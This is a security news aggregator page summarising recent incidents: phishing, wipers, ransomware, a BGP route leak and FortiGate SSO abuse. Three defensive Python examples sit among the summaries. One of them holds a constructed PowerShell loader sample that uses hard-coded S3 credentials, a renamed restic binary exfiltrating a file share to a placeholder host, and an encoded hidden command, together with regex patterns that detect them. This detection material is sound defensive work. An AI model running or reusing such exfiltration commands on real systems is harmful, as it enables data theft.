ciso brief

All news in category “Incidents and Data Breaches”

2724 articles · page 59 of 137

Multi-Stage Phishing Targets Russia with Amnesia RAT

🔒 Fortinet researchers detailed a multi-stage phishing campaign targeting Russian organizations that delivers the Amnesia RAT and Hakuna Matata ransomware. Attackers use business-themed decoy documents and malicious LNK files that fetch staged PowerShell loaders from GitHub while binary payloads are hosted on Dropbox. The chain abuses defendnot to disable Microsoft Defender, leverages Telegram bots for telemetry and exfiltration, and assembles payloads in memory to minimize disk artifacts. Targeted recipients include HR and payroll staff, enabling credential theft, surveillance, and destructive encryption.

DynoWiper Used in Attempted Sandworm Attack on Poland

⚠️ A new wiper malware named DynoWiper was used in an attempted disruptive attack on Poland's power sector on December 29–30, 2025, according to a report by ESET. The activity is attributed to the Russia-linked group Sandworm based on overlaps with prior wiper campaigns. Targeted systems included two CHP plants and a renewables management system, but officials report no evidence of successful disruption. Poland is accelerating safeguards and drafting stricter cybersecurity legislation for IT and OT risk management and incident response.

ShinyHunters Claim Responsibility for SSO Vishing Attacks

📞 ShinyHunters says it is behind a wave of voice-phishing campaigns that compromise single sign-on accounts at Okta, Microsoft Entra, and Google, enabling access to downstream SaaS platforms. Attackers call employees posing as IT, steer victims through dynamic phishing pages and capture multi-factor authentication in real time, then enumerate connected applications to harvest data. The group claims Salesforce as a primary target and has issued extortion demands using stolen information.

ESET: Sandworm Linked to Late-2025 Polish Grid Attack

🔎 ESET Research attributes a coordinated late‑2025 cyberattack on Poland’s power grid to the Russia‑aligned APT group Sandworm, citing strong overlaps in malware and tactics. The analyzed destructive payload, named DynoWiper, is detected as Win32/KillFiles.NMO (SHA‑1: 4EC3C90846AF6B79EE1A5188EEFA3FD21F6D4CF6). Researchers state medium confidence in the attribution and report they are not aware of any confirmed operational disruption. The incident occurred on the tenth anniversary of Sandworm’s 2015 Ukrainian power outage.

US to deport Venezuelans who emptied bank ATMs using malware

🏧 South Carolina prosecutors said two Venezuelan nationals pleaded guilty to conspiracy and computer crimes after using malware to force ATMs to dispense cash across the southeastern United States. They targeted older ATM models, installing a Ploutus variant by connecting laptops, using external drives, or swapping hard drives to trigger unauthorized withdrawals. Both defendants were sentenced, ordered to pay restitution, and face deportation following their terms.

January 22, 2026 IPv6 BGP Route Leak from Miami Data Center

⚠️ On January 22, 2026, an automated routing policy change caused Cloudflare to unintentionally advertise IPv6 routes from a Miami router for 25 minutes. The misconfigured policy accepted routes learned over internal BGP (IBGP) and re-advertised them to external peers and transit providers, so traffic for non-Cloudflare prefixes was drawn into Miami, causing congestion, elevated packet loss and higher latency on backbone links. Firewall filters on the router discarded around 12 Gbps of ingress traffic destined for those non-downstream prefixes. Cloudflare paused the automation, reverted the change, restored normal operation, and apologized to affected users, customers, and external networks.
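The leak described above is the classic case of an export policy that trusts whatever sits in the RIB, including routes that arrived over IBGP from peers and transit elsewhere in the network. The following is an added illustration, not Cloudflare's configuration or code: a toy RIB for a hypothetical AS 64500 with one customer, a naive export function that reproduces the failure, and a safe one that gates announcements on both the AS_PATH origin and an explicit prefix-list. ASNs, prefixes (all inside the 2001:db8::/32 documentation range) and route origins are constructed.

```python
import ipaddress
from dataclasses import dataclass

# Hypothetical network: AS 64500 with one customer AS 64510. ASNs come from the
# private/documentation ranges and prefixes from 2001:db8::/32; none of this is
# Cloudflare's real routing data.
MY_ASN = 64500
CUSTOMER_ASNS = {64510}

# Prefix-list of what this AS is ever allowed to announce to peers/transit:
# its own space plus the customer cone. Anything outside is withheld.
ANNOUNCE_PREFIX_LIST = [
    ipaddress.ip_network("2001:db8:100::/44"),  # own aggregate
    ipaddress.ip_network("2001:db8:200::/47"),  # customer 64510
    ipaddress.ip_network("2001:db8:300::/48"),  # customer 64510
]


@dataclass(frozen=True)
class Route:
    prefix: str
    learned_from: str   # "ibgp" (another of our routers), "customer", "peer" or "transit"
    as_path: tuple      # received AS_PATH; () means locally originated


# Constructed RIB of the edge router. The two /40s are the kind of routes that
# leak: learned from a peer or transit provider elsewhere and carried over IBGP.
RIB = [
    Route("2001:db8:100::/48", "ibgp", ()),
    Route("2001:db8:200::/48", "customer", (64510,)),
    Route("2001:db8:300::/48", "ibgp", (64510,)),
    Route("2001:db8:f00::/40", "ibgp", (64520, 64530)),
    Route("2001:db8:e00::/40", "ibgp", (64540,)),
]


def export_to_ebgp_naive(rib):
    """The failure mode in the report: export everything in the RIB, including
    IBGP-carried routes that originated at peers or transit providers."""
    return [r.prefix for r in rib]


def in_customer_cone(as_path):
    """True for locally originated routes and for routes whose entire AS_PATH
    stays inside our own ASN and our customers' ASNs."""
    if not as_path:
        return True
    return as_path[-1] in CUSTOMER_ASNS and all(
        asn == MY_ASN or asn in CUSTOMER_ASNS for asn in as_path)


def export_to_ebgp_safe(rib):
    """Export only routes that pass both the AS_PATH origin check and the
    explicit prefix-list. Returns (exported, withheld)."""
    exported, withheld = [], []
    for r in rib:
        net = ipaddress.ip_network(r.prefix)
        prefix_ok = any(net.subnet_of(allowed) for allowed in ANNOUNCE_PREFIX_LIST)
        if prefix_ok and in_customer_cone(r.as_path):
            exported.append(r.prefix)
        else:
            withheld.append(r.prefix)
    return exported, withheld


def would_leak(rib):
    """Prefixes the naive policy announces that the safe policy would block."""
    exported, _ = export_to_ebgp_safe(rib)
    return [p for p in export_to_ebgp_naive(rib) if p not in exported]


if __name__ == "__main__":
    print("leaked by naive export policy:", would_leak(RIB))
```

The two checks are deliberately independent: the prefix-list catches a route whose AS_PATH was rewritten or stripped, and the AS_PATH check catches a route inside the allowed space that nonetheless arrived from a peer. Running `would_leak` against a candidate policy change before automation pushes it is the kind of gate that would have withheld the two /40s here.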

Ransomware Hits Verkehrsgesellschaft Main-Tauber Operations

🔒 The office and mobility centre of Verkehrsgesellschaft Main-Tauber (VGMT) are closed and offline after a confirmed cyberattack that encrypted the organisation’s servers and data. It is unclear whether sensitive information was stolen; investigations are ongoing with support from the Baden-Württemberg state cybersecurity agency, local police, district IT specialists and an external vendor. VGMT says public local transport remains unaffected while teams work to restore limited services under heightened security precautions.

Under Armour Investigates Alleged Leak of 72M Records

🔒 Under Armour is investigating claims that an unauthorized third party obtained customer data after the Everest ransomware group allegedly added the brand as a victim and claimed to have taken 343GB of information. Reports on 18 January 2026 said roughly 72 million email addresses and other personal details were posted on a hacking forum, and the incident was listed by Have I Been Pwned on 21 January. Compromised data is reported to include names, dates of birth, genders, geographic locations, purchase history and possibly phone numbers and some employee contact information. Under Armour says there is no evidence UA.com, payment processing systems or customer passwords were affected, and the company is working with external cybersecurity experts to investigate.

Phishing Leads to LogMeIn RMM Deployment for Persistence

🔒 Cybersecurity researchers describe a two-wave phishing campaign that uses fake Greenvelope invitations to harvest Microsoft Outlook, Yahoo! and AOL credentials, then leverages those stolen logins to register and deploy legitimate LogMeIn RMM tools. Attackers deliver a signed executable, GreenVelopeCard.exe, containing a JSON configuration that silently installs LogMeIn Resolve and connects to an attacker-controlled URL. The RMM is configured for persistent, elevated access and hidden scheduled tasks to ensure survival and ongoing remote control.

Microsoft Flags Multi-Stage AitM Phishing in Energy Sector

🔒 Microsoft warns of a multi-stage adversary-in-the-middle (AitM) phishing and business email compromise (BEC) campaign targeting the energy sector. The attackers abused SharePoint file sharing and legitimate, trusted sender addresses (a living-off-trusted-sites, or LOTS, technique) to deliver credential-harvesting links, then used stolen session cookies and inbox rules to persist and hide their activity. Microsoft says a simple password reset is insufficient: organizations must revoke active sessions, remove malicious inbox rules, and enforce phishing-resistant authentication.
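Removing malicious inbox rules first requires finding them among the legitimate ones. The following is an added example, not Microsoft's guidance or tooling: a triage pass over inbox rules in the shape of Microsoft Graph messageRule objects that flags the patterns AitM and BEC operators rely on (blank or punctuation-only names, filters on financial or security keywords, external forwarding, parking mail in rarely opened folders, marking it read or deleting it). The sample rules, the internal domain and the folder names are constructed; Graph returns moveToFolder as a folder id, so the example assumes that id has already been resolved to a display name.

```python
import re

# Constructed inbox rules in the shape of Microsoft Graph messageRule objects.
# Graph returns moveToFolder as a folder id; the names here assume that id has
# already been resolved to a display name.
SAMPLE_RULES = [
    {"displayName": ".", "isEnabled": True,
     "conditions": {"subjectContains": ["invoice", "wire transfer", "payment"]},
     "actions": {"moveToFolder": "RSS Feeds", "markAsRead": True}},
    {"displayName": "Backup", "isEnabled": True,
     "conditions": {},
     "actions": {"forwardTo": [{"emailAddress": {"address": "archive@mailbox.example"}}]}},
    {"displayName": "Newsletter cleanup", "isEnabled": True,
     "conditions": {"senderContains": ["newsletter@vendor.example"]},
     "actions": {"moveToFolder": "Archive"}},
    {"displayName": "Old rule", "isEnabled": False,
     "conditions": {"subjectContains": ["hacked"]},
     "actions": {"delete": True}},
]

# Terms an AitM/BEC operator filters so the victim never sees the warning or the fraud.
SUSPICIOUS_TERMS = {"invoice", "wire", "payment", "password", "hacked", "phish",
                    "suspicious", "security alert", "mfa", "verification"}
# Folders users rarely open; a classic place to park hidden mail.
HIDE_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history",
                "junk email", "deleted items"}
FORWARD_ACTIONS = ("forwardTo", "forwardAsAttachmentTo", "redirectTo")


def _recipients(actions):
    """Yield every address a rule forwards or redirects to, lower-cased."""
    for key in FORWARD_ACTIONS:
        for r in actions.get(key, []):
            yield r["emailAddress"]["address"].lower()


def triage_rule(rule, internal_domains):
    """Return reason codes for one rule; an empty list means nothing noteworthy."""
    reasons = []
    cond, act = rule.get("conditions", {}), rule.get("actions", {})
    name = rule.get("displayName", "")
    # ".", ",", ".." and similar names are meant to be overlooked in the rule list.
    if len(re.sub(r"[\W_]", "", name)) <= 1:
        reasons.append("blank_or_punctuation_name")
    terms = [t.lower() for t in cond.get("subjectContains", []) + cond.get("bodyContains", [])]
    if any(s in t for t in terms for s in SUSPICIOUS_TERMS):
        reasons.append("keyword_filter")
    external = [a for a in _recipients(act) if a.rsplit("@", 1)[-1] not in internal_domains]
    if external:
        reasons.append("external_forward")
    if act.get("moveToFolder", "").lower() in HIDE_FOLDERS:
        reasons.append("hide_in_folder")
    if act.get("delete") or act.get("permanentDelete"):
        reasons.append("delete")
    # Marking as read is only interesting when combined with filtering or hiding.
    if act.get("markAsRead") and ("keyword_filter" in reasons or "hide_in_folder" in reasons):
        reasons.append("mark_as_read")
    return reasons


def triage_rules(rules, internal_domains):
    """Flag enabled rules only; disabled rules are still worth a look during
    the investigation but are not acting on mail."""
    findings = []
    for rule in rules:
        if not rule.get("isEnabled", True):
            continue
        reasons = triage_rule(rule, internal_domains)
        if reasons:
            findings.append({"rule": rule.get("displayName", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_rules(SAMPLE_RULES, {"corp.example"}):
        print(f"{f['rule']!r}: {', '.join(f['reasons'])}")
```

In a real response the rule list comes from Graph (`GET /users/{id}/mailFolders/inbox/messageRules`) for every mailbox the stolen cookies could have reached, and the triage runs before, not after, sessions are revoked, so the rules can be correlated with the sign-in that created them.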

INC Ransomware Slip Reveals Cloud Backup Weaknesses

🔍 Florida-based Cyber Centaurs discovered that the INC ransomware group left behind Restic backup artifacts that exposed an S3-style cloud repository used to hold stolen files. By performing forensic, non-destructive enumeration with Restic semantics, investigators were able to locate and decrypt datasets belonging to 12 US firms. The team reported findings to law enforcement and highlighted practical remediation steps: audit backups, monitor for encrypted egress, and patch backup software promptly.

Okta SSO Accounts Targeted by Vishing Phishing Kits

🔔 Okta warns of bespoke vishing phishing kits sold as a service that enable live adversary-in-the-middle attacks to steal Okta SSO credentials. These kits include a C2 panel that lets callers control the victim's authentication flow in real time and synchronize fraudulent MFA dialogs to bypass push-based protections. Okta urges adoption of phishing-resistant MFA such as Okta FastPass, FIDO2 security keys, or passkeys and recommends user education and vendor notifications.

Osiris Ransomware Employs POORTRY Driver to Evade Detection

🔒 Symantec and Carbon Black disclosed a new ransomware family called Osiris that targeted a major food service franchisee operator in Southeast Asia in November 2025. The attackers deployed a bespoke malicious driver named POORTRY in a BYOVD-style technique to disable security tooling and elevate privileges, and they exfiltrated data to Wasabi cloud buckets using Rclone before encryption. Osiris uses a hybrid per-file encryption scheme that generates unique keys per file, can stop services and terminate processes, and targets numerous backup and productivity services; defenders are advised to limit RDP exposure, monitor dual‑use tools, enforce MFA, adopt application allowlisting where feasible, and maintain off-site backups.

INC ransomware OPSEC lapse allowed recovery for 12 US orgs

🔍 Cyber Centaurs conducted a forensic investigation after a client reported ransomware activity and found a RainINC variant executed from the PerfLogs directory. Analysts discovered artifacts tied to Restic — renamed binaries, PowerShell scripts (notably new.ps1 with Base64-encoded commands) and hardcoded S3 credentials — indicating long-lived attacker-controlled backup repositories. Using a controlled, non-destructive enumeration they recovered encrypted backups for 12 unrelated U.S. organizations across healthcare, manufacturing, technology, and services, preserved copies, and notified law enforcement. The team published findings, a list of tools observed in INC infrastructure, and YARA/Sigma rules to help defenders detect suspicious Restic usage and renamed binaries.
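Both INC items above turn on the same artifacts: restic driven through a renamed binary, PowerShell with Base64-encoded commands, and S3 credentials sitting in a script. The following is an added example, not Cyber Centaurs' published rules or tooling: a hunting routine that first replaces every `-EncodedCommand` blob with its decoded UTF-16LE content and then looks for restic repository strings, `RESTIC_*` environment variables and AWS key material, so a binary named anything at all still surfaces. The sample script, its paths and repository names are constructed; the AWS keys are Amazon's documentation placeholders, not real credentials.

```python
import base64
import binascii
import re

# Constructed sample imitating a loader of the kind described: hardcoded S3
# credentials, restic run through a renamed binary from PerfLogs, and a second
# invocation hidden behind -EncodedCommand. Keys are AWS documentation placeholders.
_HIDDEN = "& 'C:\\PerfLogs\\svchost64.exe' -r s3:s3.example.net/bucket-b snapshots"
_HIDDEN_B64 = base64.b64encode(_HIDDEN.encode("utf-16le")).decode()
SAMPLE_NEW_PS1 = "\n".join([
    '$env:AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"',
    '$env:AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"',
    '$env:RESTIC_PASSWORD = "Sup3rS3cret"',
    '& C:\\PerfLogs\\svchost64.exe -r s3:s3.example.net/bucket-a backup C:\\Shares',
    'powershell.exe -NoP -W Hidden -EncodedCommand ' + _HIDDEN_B64,
])

ENCODED_CMD_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
RESTIC_REPO_RE = re.compile(r"(?<![\w.:/])s3:[\w.\-:/]+")
RESTIC_ENV_RE = re.compile(r"\bRESTIC_(?:PASSWORD(?:_FILE|_COMMAND)?|REPOSITORY)\b")
AWS_KEY_ID_RE = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
AWS_SECRET_RE = re.compile(r"""AWS_SECRET_ACCESS_KEY\W+['"]?([A-Za-z0-9/+=]{40})""")


def decode_encoded_commands(text):
    """Decode every -EncodedCommand payload (Base64 of UTF-16LE, as PowerShell expects)."""
    out = []
    for m in ENCODED_CMD_RE.finditer(text):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-16le"))
        except (binascii.Error, UnicodeDecodeError):
            continue
    return out


def deobfuscate(text):
    """Replace each encoded blob with its decoded command so the pattern
    matching below sees the real command line instead of Base64 noise."""
    def repl(m):
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16le")
        except (binascii.Error, UnicodeDecodeError):
            return m.group(0)
        return "-Command " + decoded
    return ENCODED_CMD_RE.sub(repl, text)


def _unique(seq):
    seen, out = set(), []
    for x in seq:
        if x not in seen:
            seen.add(x)
            out.append(x)
    return out


def hunt(text):
    """Collect restic/S3 indicators from a script and from anything it hides in
    encoded commands. Keys on restic syntax, not on the binary's name."""
    clear = deobfuscate(text)
    return {
        "decoded_commands": decode_encoded_commands(text),
        "restic_repos": _unique(RESTIC_REPO_RE.findall(clear)),
        "restic_env_vars": _unique(RESTIC_ENV_RE.findall(clear)),
        "aws_access_keys": _unique(AWS_KEY_ID_RE.findall(clear)),
        "aws_secret_present": AWS_SECRET_RE.search(clear) is not None,
    }


if __name__ == "__main__":
    for key, value in hunt(SAMPLE_NEW_PS1).items():
        print(f"{key}: {value}")
```

The same routine applied to PowerShell operational logs or EDR command-line telemetry turns "encrypted egress to an S3-compatible endpoint" from a network hunch into a concrete repository name and credential pair that can be handed to law enforcement or the bucket's provider.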

PcComponentes denies hacker claim of 16M customer breach

🔒 PcComponentes has denied claims by an online actor using the alias 'daghetiaw' that it stole personal data for 16.3 million people. Security platform Hackrisk.io reported the claim and a shared 500,000-line sample, while PcComponentes says there was no unauthorized access to its databases. The retailer attributes the activity to credential stuffing, stresses that raw payment card data were not stored, and says it has implemented measures to strengthen account protection.

Ransomware Disrupts Conceptnet, Affecting Around 500 Clients

🔒 Conceptnet reported a ransomware attack that encrypted central systems, including web and email servers, after the perpetrators gained access around 13 January 2026. The incident was detected, isolated and reported to the authorities, and external forensics teams are assisting with recovery. The provider, which supports roughly 500 customers, has set up temporary websites for affected clients, including REWAG, Stadtwerk Regensburg and SSV Jahn Regensburg, while a possible ransom demand and reports that AI was used in the attack are still being examined.

LastPass Phishing Campaign Targets Master Passwords

🔒 LastPass has warned users of an ongoing phishing campaign that began on January 19 and attempts to harvest master passwords by directing recipients to a fake LastPass login page. The fraudulent emails pressure users with a 24-hour "backup your vault" deadline to increase clicks. If credentials are entered, attackers can access the vault and any stored account logins. LastPass is working with partners to take down malicious domains and reiterated it will never request a master password.

KONNI's AI-Enhanced Malware Targets Software Developers

🐞 Check Point Research is tracking an active phishing campaign by KONNI, a North Korea–linked actor that has shifted from geopolitical targets to software developers and engineering teams. The campaign specifically targets blockchain and cryptocurrency projects and uses lures crafted to resemble legitimate project documentation. Attackers deliver malicious attachments and payloads intended to compromise developer credentials and infrastructure, and the activity displays expanded geographic reach and sophisticated social-engineering techniques.

Attackers Exploit Microsoft Teams to Phish Users Worldwide

📧 Attackers abused Microsoft Teams functionality to distribute phishing content that appears to come from legitimate services. They created guest invitations and finance-themed team names that mimic billing and subscription notices, prompting recipients to contact a fraudulent support phone number. The campaign sent 12,866 phishing messages (about 990 per day) and targeted 6,135 users. Recipients were encouraged to call attackers posing as support to resolve fake payment issues.

Fortinet FortiGate SSO Exploited to Steal Configs Remotely

🚨 Cybersecurity firm Arctic Wolf reports automated attacks against Fortinet FortiGate devices that exploit the FortiCloud SSO feature to create rogue admin accounts and rapidly export firewall configurations. The campaign began January 15 and mirrors December exploitation tied to CVE-2025-59718. Observed indicators include SSO logins from cloud-init@mail.io and IP 104.28.244.114. Administrators are advised to disable FortiCloud SSO until Fortinet issues a complete fix.